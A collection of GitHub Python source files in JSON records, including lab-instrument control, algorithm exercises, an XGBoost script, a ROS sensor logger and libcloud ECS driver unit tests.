self.TimeDomainScan\n\n manipulator1 = DummyManipulator()\n manipulator1.setPreferredUnits(ureg.mm, ureg.mm / ureg.s) # added JanO 22.1.2019\n manipulator1.objectName = \"PI C-863 1\"\n self.manipulator1 = manipulator1\n self.positioningVelocityM1 = Q_(4, \"mm/s\")\n self.scanVelocity = Q_(4, \"mm/s\")\n self.manipulator1.set_limits(min_=Q_(-15, \"mm\"), max_=Q_(110, \"mm\"))\n\n manipulator2 = DummyManipulator()\n manipulator2.setPreferredUnits(ureg.mm, ureg.mm / ureg.s)\n manipulator2.objectName = \"PI C-863 2\"\n self.positioningVelocityM2 = Q_(4, \"mm/s\")\n self.manipulator2 = manipulator2\n # self.manipulator2.set_limits(min_=Q_(-15, \"mm\"), max_=Q_(15, \"mm\"))\n\n self.dataSaver.registerManipulator(self.manipulator1, \"Position1\")\n self.dataSaver.registerManipulator(self.manipulator2, \"Position2\")\n self.dataSaver.registerObjectAttribute(self, \"currentMeasurementName\", \"currentTableEntry\")\n self.dataSaver.fileNameTemplate = \"{date}-{name}-{currentTableEntry}-{Position1}-{Position2}\"\n self.dataSaver.set_trait(\"path\", Path(r\"\"))\n self.TimeDomainScan.addDataSetReadyCallback(self.dataSaver.process)\n self.TimeDomainScan.addDataSetReadyCallback(self.setCurrentData)\n self._backAndForth = True\n\n def setCurrentData(self, dataSet):\n self.set_trait(\"currentData\", dataSet)\n\n async def __aenter__(self):\n await super().__aenter__()\n return self\n\n @action(\"Take Tabular measurements\")\n async def takeTabularScan(self):\n self.set_trait(\"progress2\", 0) # progress trait changes added by Cornelius for additional progress Information\n for x in range(self.nMeasurements):\n dataset = await self.readDataSet()\n self.set_trait(\"progress2\", (x + 1) / self.nMeasurements)\n\n @action(\"Take No. 
of measurements\")\n async def takeSingleMeasurements(self):\n self.set_trait(\"progress\", 0) # progress trait changes added by Cornelius for additional progress Information\n self.set_trait(\"progress2\", 0)\n for x in range(self.nMeasurements):\n dataset = await self.TimeDomainScan.readDataSet()\n self.set_trait(\"progress\", (x + 1) / self.nMeasurements)\n self.set_trait(\"progress2\", (x + 1) / self.nMeasurements)\n\n @action(\"Stop\")\n async def stop(self): # added by Cornelius to Stop both tabular scan and multiple measurements scan\n if not self._activeFuture:\n if not self.TimeDomainScan._activeFuture:\n return\n self.TimeDomainScan._activeFuture.cancel()\n return\n self._activeFuture.cancel()\n\n async def __aexit__(self, *args):\n await super().__aexit__(*args)\n","repo_name":"Owlbearpig/taipan","sub_path":"example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7091631741","text":"input = \"11\t11\t13\t7\t0\t15\t5\t5\t4\t4\t1\t1\t7\t1\t15\t11\"\n\nbanks = [int(x) for x in input.split()]\nsnapshots = set()\nsnapshots.add(str(banks))\n\nlenBanks = len(banks)\n\nloopSize = 0\nloopStarted = False\nsnapshotToRemember = \"\"\n\ntoDistribute = 0\ni = 0\nwhile True:\n\ti = banks.index(max(banks))\n\n\ttoDistribute = int(banks[i])\n\tbanks[i] = 0\n\t\n\twhile toDistribute > 0:\n\t\ti += 1\n\t\tif i == lenBanks:\n\t\t\ti = 0\n\t\tbanks[i] += 1\n\t\ttoDistribute -= 1\n\n\tsnapshot = str(banks)\n\n\tif snapshot in snapshots and not loopStarted:\n\t\tsnapshotToRemember = snapshot\n\t\tloopStarted = True\n\t\tcontinue\n\n\tif loopStarted:\n\t\tloopSize += 1\n\n\tif snapshot == snapshotToRemember:\n\t\tbreak # we're done here\n\n\tsnapshots.add(str(banks))\n\nprint(loopSize)","repo_name":"jpparent/AoC2017","sub_path":"06-2.py","file_name":"06-2.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7569017912","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\n\nn,m = map(int,input().split())\ngraph = []\nfor i in range(n):\n a = list(input())[:-1]\n graph.append(list(map(int,a)))\nvisited =[[0 for _ in range(m)] for _ in range(n)]\n\ndx = [1,-1,0,0]\ndy = [0,0,1,-1]\n\n\ndef bfs(graph,visited,sx,sy):\n global n\n global m\n queue = deque()\n queue.append((sx,sy))\n visited[sx][sy] = 1\n while queue:\n x,y = queue.popleft()\n for i in range(4):\n nx,ny= x+dx[i],y+dy[i]\n if 0<=nx 0 and charlist[i] == charlist[i - 1]:\n continue\n temp = self.Permutation(''.join(charlist[:i]) + ''.join(charlist[i + 1:]))\n for j in temp:\n pStr.append(charlist[i] + j)\n return pStr\n\n","repo_name":"buppter/algorithms","sub_path":"TargetOffer/字符串的排列.py","file_name":"字符串的排列.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"28464284302","text":"import json\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nimport xgboost as xgb\nfrom sklearn.metrics import accuracy_score\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\ndef load_data(paths):\n data = []\n for p in paths:\n with open(p, 'r') as f:\n data += json.load(f)\n return [{'bot': d['bot'], 'user': d['user']} for d in data]\n\nfolder_path = 'MMDS/1' \nfile_list = []\n\nfor filename in os.listdir(folder_path):\n 
file_path = os.path.join(folder_path, filename).replace('\\\\', '/')\n file_list.append(file_path)\ndf = load_data(file_list)\ndf = pd.DataFrame(df)\ny = df['bot'].astype('int')\nX = pd.get_dummies(df['user'])\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\nmodel = xgb.XGBClassifier()\nmodel.fit(X_train, y_train)\n\npredictions = model.predict(X_test)\n\naccuracy = accuracy_score(y_test, predictions)\n","repo_name":"naz2001r/MMDB_HW_2023","sub_path":"Xgboost.py","file_name":"Xgboost.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36363555477","text":"import torch.nn as nn\n\ndef get_activation_function(name):\n if name is None or name == \"identity\":\n return nn.Identity()\n if name == \"relu\":\n return nn.ReLU()\n if name == \"relu6\":\n return nn.ReLU6()\n if name == \"lrelu\":\n return nn.LeakyReLU()\n if name == \"prelu\":\n return nn.PReLU()\n if name == \"selu\":\n return nn.SELU()\n if name == \"celu\":\n return nn.CELU()\n if name == \"softmax\":\n return nn.Softmax(dim=0)\n","repo_name":"SoliareofAstora/space_memory","sub_path":"components/model/activations.py","file_name":"activations.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74506621866","text":"import os\nimport appTemplate\nfrom typing import List\n\n\nclass Tail(appTemplate.AppTemplate):\n def __tail(self, lines: List[str], number: int = 10) -> List[str]:\n result: List[str] = []\n for i in range(len(lines) - 1, -1, -1):\n try:\n if number > 0:\n result.append(lines[i])\n number -= 1\n else:\n break\n except IndexError:\n break\n result.reverse()\n return result\n\n def exec(self,\n raw_args: List[str],\n stdin: List[str],\n stdout: List[str]) -> int:\n\n args = []\n for i in raw_args:\n expanded = self.gen_wildcard_matches(i)\n if expanded == []:\n args.append(i)\n else:\n args.extend(expanded)\n\n result = []\n number = 10\n if len(args) == 1 and os.path.isfile(args[0]):\n # passing file from argument with no options\n with open(args[0], \"r\") as file:\n lines = file.readlines()\n result = self.__tail(lines, number)\n\n elif len(stdin) > 1:\n # passing file from stdin.\n if len(args) == 2 and args[0] == \"-n\":\n try:\n number = int(args[1])\n except ValueError:\n return 1\n elif len(args) == 0:\n number = 10\n else:\n return 1\n result = self.__tail(stdin.copy(), number)\n\n elif len(args) == 3 and args[0] == \"-n\":\n # passing file from argument\n try:\n number = int(args[1])\n except ValueError:\n stdout.clear()\n return 1\n with open(args[2], \"r\") as file:\n lines = file.readlines()\n result = self.__tail(lines, number)\n else:\n stdout.clear()\n return 1\n stdout.clear()\n stdout.extend(i if i and i[-1] != \"\\n\" else i[:-1] for i in result)\n return 0\n\n\n__app__ = Tail()\n","repo_name":"chriszhang1/comp0010_shell","sub_path":"src/app/tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16421121963","text":"import numpy as np\nimport pandas as pd\nfrom pandas import DataFrame as DF \n\ndef main():\n data = {\n 'unit price' : [1000, 280 , 900],\n 'number' : [ 25, 120, 30]\n }\n df =DF(data, index=['store1', 'store2', 'store3'])\n display(df)\n df['total price']=df['unit price']*df['number']\n display(df)\n df = 
df.sort_values(by='total price', ascending=False)\n display(df[0:2])\n \n \n \nif __name__ == '__main__':\n main()\n","repo_name":"asdfjklec/HW7_KMH","sub_path":"Q3/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7287041352","text":"import turtle\n\npen = turtle.Pen()\npen.speed(10)\npen.pencolor('pink')\npen.pensize(5)\npen.circle(50)\npen.penup()\npen.forward(80)\npen.pendown()\npen.pencolor('black')\npen.circle(50)\npen.penup()\npen.forward(80)\npen.pendown()\npen.pencolor('red')\npen.circle(50)\npen.penup()\npen.left(90)\npen.forward(50)\npen.left(90)\npen.forward(50)\npen.pendown()\npen.pencolor('green')\npen.circle(50)\npen.penup()\npen.forward(80)\npen.pendown()\npen.pencolor('yellow')\npen.circle(50)\n\n# Write text\npen.penup() # Lift the pen\npen.forward(160) # Move the pen to a specified coordinate\npen.pendown() # Put down the pen\npen.write('mememe', align='center', font=('youyouyou', '20')) \npen.penup() # Lift the pen\npen.forward(150) # Move the pen to a specified coordinate\npen.pendown() # Put down the pen\npen.write('222', align='center', font=('666', '20'))\n\nturtle.done()\n","repo_name":"whr4869/Boring_code","sub_path":"小海龟画图/五环.py","file_name":"五环.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29374558879","text":"#!/usr/bin/env python3\nimport sys\nfrom time import gmtime, strftime\nimport rospy\nimport rosbag\nfrom dare_sensors.msg import EEGMessage\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nimport csv\nimport cv2\nimport numpy as np\nimport os\n\nclass Subscriber:\n\n def __init__(self, directory_path):\n \n print(directory_path)\n self.directory_path = directory_path\n self.data_source=\"EEG\"\n #initialize csv for writing eeg data\n \n \n self.muse_csv_file = open(self.directory_path+\"/raw_eeg.csv\", \"w\")\n self.muse_csv_writer = csv.writer(self.muse_csv_file)\n self.muse_csv_writer.writerow([\"timestamp\", \"TP9\", \"AF7\", \"AF8\", \"TP10\"])\n\n #initialize csv for writing eeg data\n self.plux_csv_file = open(self.directory_path+\"/plux.csv\", \"w\")\n self.plux_csv_writer = csv.writer(self.plux_csv_file)\n self.plux_csv_writer.writerow([\"timestamp\", \"ECG\", \"GSR\"])\n\n\n #initialize the video writers\n self.rgb_video_filename1 = self.directory_path + \"/video_1.avi\"\n self.rgb_codec1 = cv2.VideoWriter_fourcc(*'XVID')\n self.rgb_fps1 = 30.0\n self.rgb_writer1 = None\n\n self.rgb_video_filename2 = self.directory_path + \"/video_2.avi\"\n self.rgb_codec2 = cv2.VideoWriter_fourcc(*'XVID')\n self.rgb_fps2 = 30.0\n self.rgb_writer2 = None\n\n self.rgb_video_filename3 = self.directory_path + \"/video_3.avi\"\n self.rgb_codec3 = cv2.VideoWriter_fourcc(*'XVID')\n self.rgb_fps3 = 30.0\n self.rgb_writer3 = None\n\n #rosbag to store the depth. conversion to xvid format might result in loss of infromation. 
\n self.depth_bag = rosbag.Bag(self.directory_path + \"/depth_data.bag\", 'w')\n\n #create the subscribers\n #subscribers for realsense cam1\n self.depth_sub_cam1 = rospy.Subscriber('camera_1/depth/image_raw', Image, self.depth_callback_cam1)\n self.rgb_sub_cam1 = rospy.Subscriber('camera_1/rgb/image_raw', Image, self.rgb_callback_cam1)\n\n #subscribers for realsense cam2 \n self.depth_sub_cam2 = rospy.Subscriber('camera_2/depth/image_raw', Image, self.depth_callback_cam2)\n self.rgb_sub_cam2 = rospy.Subscriber('camera_2/rgb/image_raw', Image, self.rgb_callback_cam2)\n\n #subscribers for logitech cam3\n self.rgb_sub_cam3 = rospy.Subscriber('camera_3/rgb/image_raw', Image, self.rgb_callback_cam3) \n\n self.muse_subscriber = rospy.Subscriber(\"/eeg_stream\", EEGMessage, self.muse_listener_callback)\n \n self.plux_subscriber = rospy.Subscriber(\"/plux_topic\", String, self.plux_listener_callback)\n \n \n def depth_callback_cam1(self, msg):\n self.depth_bag.write('camera_1/depth/image_raw', msg)\n\n def depth_callback_cam2(self, msg):\n self.depth_bag.write('camera_2/depth/image_raw', msg)\n\n def rgb_callback_cam1(self, msg):\n rgb_image = np.frombuffer(msg.data, dtype=np.uint8).reshape(msg.height, msg.width, 3)\n if self.rgb_writer1 is None:\n self.rgb_writer1 = cv2.VideoWriter(self.rgb_video_filename1, self.rgb_codec1, self.rgb_fps1,(rgb_image.shape[1], rgb_image.shape[0]))\n self.rgb_writer1.write(rgb_image)\n \n def rgb_callback_cam2(self, msg):\n rgb_image = np.frombuffer(msg.data, dtype=np.uint8).reshape(msg.height, msg.width, 3)\n if self.rgb_writer2 is None:\n self.rgb_writer2 = cv2.VideoWriter(self.rgb_video_filename2, self.rgb_codec2, self.rgb_fps2,(rgb_image.shape[1], rgb_image.shape[0]))\n self.rgb_writer2.write(rgb_image)\n\n def rgb_callback_cam3(self, msg):\n rgb_image = np.frombuffer(msg.data, dtype=np.uint8).reshape(msg.height, msg.width, 3)\n if self.rgb_writer3 is None:\n self.rgb_writer3 = cv2.VideoWriter(self.rgb_video_filename3, self.rgb_codec3, self.rgb_fps3, (rgb_image.shape[1], rgb_image.shape[0]))\n self.rgb_writer3.write(rgb_image)\n\n def muse_listener_callback(self, msg):\n rospy.loginfo('I heard: \"%s\"' % msg)\n print(msg)\n self.muse_csv_writer.writerow([msg.timestamp, msg.tp9, msg.af7, msg.af8, msg.tp10])\n self.muse_csv_file.flush()\n\n\n def plux_listener_callback(self, msg):\n rospy.loginfo('Received message from bioplux: \"%s\"' % msg.data)\n msg_tkns = str(msg.data).split(\",\")\n self.plux_csv_writer.writerow([msg_tkns[0], msg_tkns[1], msg_tkns[2]])\n self.plux_csv_file.flush()\n\n def close_resources(self):\n if self.muse_csv_file is not None:\n self.muse_csv_file.close()\n if self.plux_csv_file is not None:\n self.plux_csv_file.close()\n self.depth_bag.close()\n if self.rgb_writer1 is not None:\n self.rgb_writer1.release()\n if self.rgb_writer2 is not None:\n self.rgb_writer2.release()\n if self.rgb_writer3 is not None:\n self.rgb_writer3.release()\n\n def __del__(self):\n pass\n\ndef main():\n PATH = sys.argv[1]\n print(PATH)\n rospy.init_node(\"global_sensor_listener\", anonymous=True)\n subscriber = Subscriber(PATH)\n try:\n rospy.spin()\n except KeyboardInterrupt:\n pass\n subscriber.close_resources()\n \n\n\n\nif __name__ == '__main__':\n main()","repo_name":"heracleia/bioplux-muse-ros2","sub_path":"ros1/subscribers/global_listener.py","file_name":"global_listener.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
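The numeric fields ("file_size_in_byte", "stars") and the "pt" tag arrive as plain JSON values, so lightweight corpus statistics need no schema. A hedged aggregation sketch under the same assumptions as the reader above (hypothetical path dump.jsonl, one record per line):

import json
from collections import Counter

# Tally the "pt" partition tags seen in the records and sum the total
# amount of escaped source text carried by the dump.
tags = Counter()
total_bytes = 0
with open("dump.jsonl", encoding="utf-8") as fh:
    for line in fh:
        record = json.loads(line)
        tags[record.get("pt", "?")] += 1
        total_bytes += record.get("file_size_in_byte", 0)
print(tags.most_common())
print(total_bytes, "total bytes of source text")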
+{"seq_id":"11838448720","text":"#!/usr/bin/python\n\nimport sys\nimport CodeChiffreSonFromWord\n \nlastTenWords = []\n \ndef hasManySameCharacter(word1, word2):\n    if len(word1) > len(word2):\n        word = word1\n        word1 = word2\n        word2 = word\n    i = 0\n    same = 0.0\n    for c in word1:\n        if c == word2[i]:\n            same = same + 1.0\n        i = i + 1\n    if same != 0 and same / float(len(word2)) > 0.5:\n        return True\n    return False \n \ndef isDuplicate(newWord):\n    word = \"\"\n    if len(lastTenWords) == 100 or newWord == \"\":\n        word = lastTenWords.pop(0)[0]\n        numberOfWord = CodeChiffreSonFromWord.getNumber(word)\n        if not numberOfWord:\n            return \"\"\n        for idx, oldWord in enumerate(lastTenWords):\n            numberOfOldWord = CodeChiffreSonFromWord.getNumber(oldWord[0])\n            if int(numberOfWord) == int(numberOfOldWord) and hasManySameCharacter(word, oldWord[0]):\n                if oldWord[0].endswith(\"er\"):\n                    word = oldWord[0]\n                lastTenWords[idx] = (lastTenWords[idx][0], True)\n        i = 0\n        while i < len(lastTenWords):\n            if lastTenWords[i][1]:\n                lastTenWords.pop(i)\n            else:\n                i += 1\n    if CodeChiffreSonFromWord.getNumber(newWord) != \"\":\n        lastTenWords.append((newWord, False))\n    return word\n \ndef parseFile(fileName):\n    inputfile = open(fileName)\n    for line in inputfile:\n        word = isDuplicate(line.rstrip('\\n').replace(\" \", \"\"))\n        if word != \"\":\n            print(word + \" -> \" + CodeChiffreSonFromWord.getNumber(word))\n    while len(lastTenWords) != 0:\n        word = isDuplicate(\"\")\n        if word != \"\":\n            print(word + \" -> \" + CodeChiffreSonFromWord.getNumber(word))\n    return 1\n \nif __name__ == \"__main__\":\n    if len(sys.argv) >= 2:\n        parseFile(sys.argv[1])\n","repo_name":"Joyas/Code-chiffre-son","sub_path":"removeDuplicate.py","file_name":"removeDuplicate.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23694572612","text":"import sys\nimport unittest\n\nfrom libcloud.test import MockHttp, LibcloudTestCase\nfrom libcloud.utils.py3 import httplib\nfrom libcloud.common.types import LibcloudError\nfrom libcloud.compute.base import (\n    Node,\n    NodeSize,\n    NodeImage,\n    NodeLocation,\n    StorageVolume,\n    VolumeSnapshot,\n    NodeAuthPassword,\n)\nfrom libcloud.test.secrets import ECS_PARAMS\nfrom libcloud.compute.types import NodeState, StorageVolumeState\nfrom libcloud.test.file_fixtures import ComputeFileFixtures\nfrom libcloud.compute.drivers.ecs import ECSDriver\n\n\nclass ECSDriverTestCase(LibcloudTestCase):\n    region = \"cn-qingdao\"\n    zone = \"cn-qingdao-b\"\n    image_id = \"ubuntu1404_64_20G_aliaegis_20150325.vhd\"\n\n    def setUp(self):\n        ECSMockHttp.test = self\n        ECSDriver.connectionCls.conn_class = ECSMockHttp\n        ECSMockHttp.use_param = \"Action\"\n        ECSMockHttp.type = None\n\n        self.driver = ECSDriver(*ECS_PARAMS, region=self.region)\n        self.fake_size = NodeSize(\n            \"ecs.t1.small\", \"ecs t1 small\", None, None, None, None, self.driver\n        )\n        self.fake_image = NodeImage(self.image_id, name=\"ubuntu 14.04 64bit\", driver=self.driver)\n        self.fake_node = Node(\n            id=\"fake-node1\",\n            name=\"fake-node\",\n            state=NodeState.RUNNING,\n            public_ips=None,\n            private_ips=None,\n            driver=self.driver,\n        )\n        self.fake_volume = StorageVolume(\n            id=\"fake-volume1\",\n            name=\"fake-volume\",\n            size=self.fake_size,\n            driver=self.driver,\n        )\n        self.fake_snapshot = VolumeSnapshot(id=\"fake-snapshot1\", driver=self.driver)\n        self.fake_location = NodeLocation(\n            id=self.region, name=self.region, country=None, driver=self.driver\n        )\n        
self.fake_instance_id = \"fake_instance_id\"\n self.fake_security_group_id = \"fake_security_group_id\"\n\n def test_list_nodes(self):\n # the test describes two nodes:\n # the first on a classic network and with public ip attached\n # the second on a vpc with an elastic ip attached\n vpc_ips = [None, \"10.163.197.74\"]\n eips = [\"\", \"114.215.124.73\"]\n nodes = self.driver.list_nodes()\n self.assertIsNotNone(nodes)\n self.assertEqual(2, len(nodes))\n for node, vpc_ip, eip in zip(nodes, vpc_ips, eips):\n self.assertEqual(\"iZ28n7dkvovZ\", node.name)\n self.assertEqual(\"i-28n7dkvov\", node.id)\n self.assertEqual(NodeState.PENDING, node.state)\n self.assertEqual(1, len(node.public_ips))\n self.assertEqual(\"114.215.124.73\", node.public_ips[0])\n self.assertEqual(1, len(node.private_ips))\n self.assertEqual(\"10.163.197.74\", node.private_ips[0])\n expected_extra = {\n \"image_id\": \"ubuntu1404_64_20G_aliaegis_20150325.vhd\",\n \"description\": \"\",\n \"instance_type_family\": \"ecs.t1\",\n \"zone_id\": \"cn-qingdao-b\",\n \"internet_charge_type\": \"PayByTraffic\",\n \"serial_number\": \"ca0122d9-374d-4fce-9fc0-71f7c3eaf1c3\",\n \"io_optimized\": \"false\",\n \"device_available\": \"true\",\n \"instance_network_type\": \"classic\",\n \"hostname\": \"iZ28n7dkvovZ\",\n \"instance_type\": \"ecs.t1.small\",\n \"creation_time\": \"2015-12-27T07:35Z\",\n \"instance_charge_type\": \"PostPaid\",\n \"expired_time\": \"2999-09-08T16:00Z\",\n }\n self._validate_extras(expected_extra, node.extra)\n vpc = {\n \"vpc_id\": \"\",\n \"vswitch_id\": \"\",\n \"private_ip_address\": vpc_ip,\n \"nat_ip_address\": \"\",\n }\n self._validate_extras(vpc, node.extra[\"vpc_attributes\"])\n eip_address = {\n \"allocation_id\": \"\",\n \"ip_address\": eip,\n \"internet_charge_type\": \"\",\n \"bandwidth\": None,\n }\n self._validate_extras(eip_address, node.extra[\"eip_address\"])\n self.assertIsNone(node.extra[\"operation_locks\"][\"lock_reason\"])\n\n def test_list_nodes_with_ex_node_ids(self):\n ECSMockHttp.type = \"list_nodes_ex_node_ids\"\n nodes = self.driver.list_nodes(ex_node_ids=[\"i-28n7dkvov\", \"not-existed-id\"])\n self.assertIsNotNone(nodes)\n\n def test_list_nodes_with_ex_filters(self):\n ECSMockHttp.type = \"list_nodes_ex_filters\"\n nodes = self.driver.list_nodes(ex_filters={\"ZoneId\": self.zone})\n self.assertIsNotNone(nodes)\n\n def _validate_extras(self, expected, actual):\n self.assertIsNotNone(actual)\n for key, value in iter(expected.items()):\n self.assertTrue(key in actual)\n self.assertEqual(\n value,\n actual[key],\n (\n \"extra %(key)s not equal, \"\n 'expected: \"%(expected)s\", '\n 'actual: \"%(actual)s\"' % {\"key\": key, \"expected\": value, \"actual\": actual[key]}\n ),\n )\n\n def test_create_node(self):\n ECSMockHttp.type = \"create_node\"\n name = \"test_create_node\"\n node = self.driver.create_node(\n name=name,\n image=self.fake_image,\n size=self.fake_size,\n ex_security_group_id=\"sg-28ou0f3xa\",\n ex_description=\"description\",\n ex_internet_charge_type=\"PayByTraffic\",\n ex_internet_max_bandwidth_out=1,\n ex_internet_max_bandwidth_in=200,\n ex_hostname=\"hostname\",\n auth=NodeAuthPassword(\"password\"),\n ex_io_optimized=True,\n ex_system_disk={\n \"category\": \"cloud\",\n \"disk_name\": \"root\",\n \"description\": \"sys\",\n },\n ex_vswitch_id=\"vswitch-id1\",\n ex_private_ip_address=\"1.1.1.2\",\n ex_client_token=\"client_token\",\n )\n self.assertIsNotNone(node)\n\n def test_create_node_with_data_disk(self):\n ECSMockHttp.type = \"create_node_with_data\"\n 
self.name = \"test_create_node\"\n        self.data_disk = {\n            \"size\": 5,\n            \"category\": self.driver.disk_categories.CLOUD,\n            \"disk_name\": \"data1\",\n            \"description\": \"description\",\n            \"device\": \"/dev/xvdb\",\n            \"delete_with_instance\": True,\n        }\n        node = self.driver.create_node(\n            name=self.name,\n            image=self.fake_image,\n            size=self.fake_size,\n            ex_security_group_id=\"sg-28ou0f3xa\",\n            ex_data_disks=self.data_disk,\n        )\n        self.assertIsNotNone(node)\n\n    def test_list_sizes(self):\n        sizes = self.driver.list_sizes()\n        self.assertEqual(2, len(sizes))\n        size = sizes[0]\n        self.assertEqual(\"ecs.t1.xsmall\", size.id)\n        self.assertEqual(\"ecs.t1.xsmall\", size.name)\n        self.assertEqual(0.5, size.ram)\n        self.assertEqual(1, size.extra[\"cpu_core_count\"])\n        self.assertEqual(\"ecs.t1\", size.extra[\"instance_type_family\"])\n        size = sizes[1]\n        self.assertEqual(\"ecs.s2.small\", size.id)\n        self.assertEqual(\"ecs.s2.small\", size.name)\n        self.assertEqual(1.0, size.ram)\n        self.assertEqual(2, size.extra[\"cpu_core_count\"])\n        self.assertEqual(\"ecs.s2\", size.extra[\"instance_type_family\"])\n\n    def test_list_locations(self):\n        locations = self.driver.list_locations()\n        self.assertEqual(9, len(locations))\n        location = locations[0]\n        self.assertEqual(\"ap-southeast-1\", location.id)\n        self.assertIsNone(location.country)\n\n    def test_create_node_without_sg_id_exception(self):\n        name = \"test_create_node_without_sg_id_exception\"\n        self.assertRaises(\n            AttributeError,\n            self.driver.create_node,\n            name=name,\n            image=self.fake_image,\n            size=self.fake_size,\n        )\n\n    def test_create_node_paybytraffic_exception(self):\n        name = \"test_create_node_paybytraffic_exception\"\n        self.assertRaises(\n            AttributeError,\n            self.driver.create_node,\n            name=name,\n            image=self.fake_image,\n            size=self.fake_size,\n            ex_security_group_id=\"sg-id1\",\n            ex_internet_charge_type=\"PayByTraffic\",\n        )\n\n    def test_create_node_ex_system_disk_exception(self):\n        name = \"test_create_node_ex_system_disk_exception\"\n        self.assertRaises(\n            AttributeError,\n            self.driver.create_node,\n            name=name,\n            image=self.fake_image,\n            size=self.fake_size,\n            ex_security_group_id=\"sg-id1\",\n            ex_system_disk=None,\n        )\n\n    def test_create_node_ex_private_ip_address_exception(self):\n        name = \"test_create_node_ex_private_ip_address_exception\"\n        self.assertRaises(\n            AttributeError,\n            self.driver.create_node,\n            name=name,\n            image=self.fake_image,\n            size=self.fake_size,\n            ex_security_group_id=\"sg-id1\",\n            ex_private_ip_address=\"1.1.1.2\",\n        )\n\n    def test_reboot_node(self):\n        ECSMockHttp.type = \"reboot_node\"\n        result = self.driver.reboot_node(self.fake_node)\n        self.assertTrue(result)\n\n    def test_reboot_node_with_ex_force_stop(self):\n        ECSMockHttp.type = \"reboot_node_force_stop\"\n        result = self.driver.reboot_node(self.fake_node, ex_force_stop=True)\n        self.assertTrue(result)\n\n    def test_destroy_node(self):\n        ECSMockHttp.type = \"destroy_node\"\n        result = self.driver.destroy_node(self.fake_node)\n        self.assertTrue(result)\n\n    def test_ex_start_node(self):\n        ECSMockHttp.type = \"start_node\"\n        result = self.driver.ex_start_node(self.fake_node)\n        self.assertTrue(result)\n\n    def test_ex_stop_node(self):\n        ECSMockHttp.type = \"stop_node\"\n        result = self.driver.ex_stop_node(self.fake_node)\n        self.assertTrue(result)\n\n    def test_stop_node_with_ex_force_stop(self):\n        ECSMockHttp.type = \"stop_node_force_stop\"\n        result = self.driver.ex_stop_node(self.fake_node, ex_force_stop=True)\n        self.assertTrue(result)\n\n    def test_create_public_ip(self):\n        ECSMockHttp.type = 
\"create_public_ip\"\n result = self.driver.create_public_ip(self.fake_instance_id)\n self.assertTrue(result)\n\n def test_list_volumes(self):\n volumes = self.driver.list_volumes()\n self.assertEqual(2, len(volumes))\n volume = volumes[0]\n self.assertEqual(\"d-28m5zbua0\", volume.id)\n self.assertEqual(\"\", volume.name)\n self.assertEqual(5, volume.size)\n self.assertEqual(StorageVolumeState.AVAILABLE, volume.state)\n expected_extras = {\n \"region_id\": \"cn-qingdao\",\n \"zone_id\": \"cn-qingdao-b\",\n \"description\": \"\",\n \"type\": \"data\",\n \"category\": \"cloud\",\n \"image_id\": \"\",\n \"source_snapshot_id\": \"\",\n \"product_code\": \"\",\n \"portable\": True,\n \"instance_id\": \"\",\n \"device\": \"\",\n \"delete_with_instance\": False,\n \"enable_auto_snapshot\": False,\n \"creation_time\": \"2014-07-23T02:44:07Z\",\n \"attached_time\": \"2014-07-23T07:47:35Z\",\n \"detached_time\": \"2014-07-23T08:28:48Z\",\n \"disk_charge_type\": \"PostPaid\",\n \"operation_locks\": {\"lock_reason\": None},\n }\n self._validate_extras(expected_extras, volume.extra)\n volume = volumes[1]\n self.assertEqual(\"d-28zfrmo13\", volume.id)\n self.assertEqual(\"ubuntu1404sys\", volume.name)\n self.assertEqual(5, volume.size)\n self.assertEqual(StorageVolumeState.INUSE, volume.state)\n expected_extras = {\n \"region_id\": \"cn-qingdao\",\n \"zone_id\": \"cn-qingdao-b\",\n \"description\": \"Description\",\n \"type\": \"system\",\n \"category\": \"cloud\",\n \"image_id\": \"ubuntu1404_64_20G_aliaegis_20150325.vhd\",\n \"source_snapshot_id\": \"\",\n \"product_code\": \"\",\n \"portable\": False,\n \"instance_id\": \"i-28whl2nj2\",\n \"device\": \"/dev/xvda\",\n \"delete_with_instance\": True,\n \"enable_auto_snapshot\": True,\n \"creation_time\": \"2014-07-23T02:44:06Z\",\n \"attached_time\": \"2016-01-04T15:02:17Z\",\n \"detached_time\": \"\",\n \"disk_charge_type\": \"PostPaid\",\n \"operation_locks\": {\"lock_reason\": None},\n }\n self._validate_extras(expected_extras, volume.extra)\n\n def test_list_volumes_with_ex_volume_ids(self):\n ECSMockHttp.type = \"list_volumes_ex_volume_ids\"\n volumes = self.driver.list_volumes(ex_volume_ids=[\"i-28n7dkvov\", \"not-existed-id\"])\n self.assertIsNotNone(volumes)\n\n def test_list_volumes_with_ex_filters(self):\n ECSMockHttp.type = \"list_volumes_ex_filters\"\n ex_filters = {\"InstanceId\": self.fake_node.id}\n volumes = self.driver.list_volumes(ex_filters=ex_filters)\n self.assertIsNotNone(volumes)\n\n def test_list_volume_snapshots(self):\n snapshots = 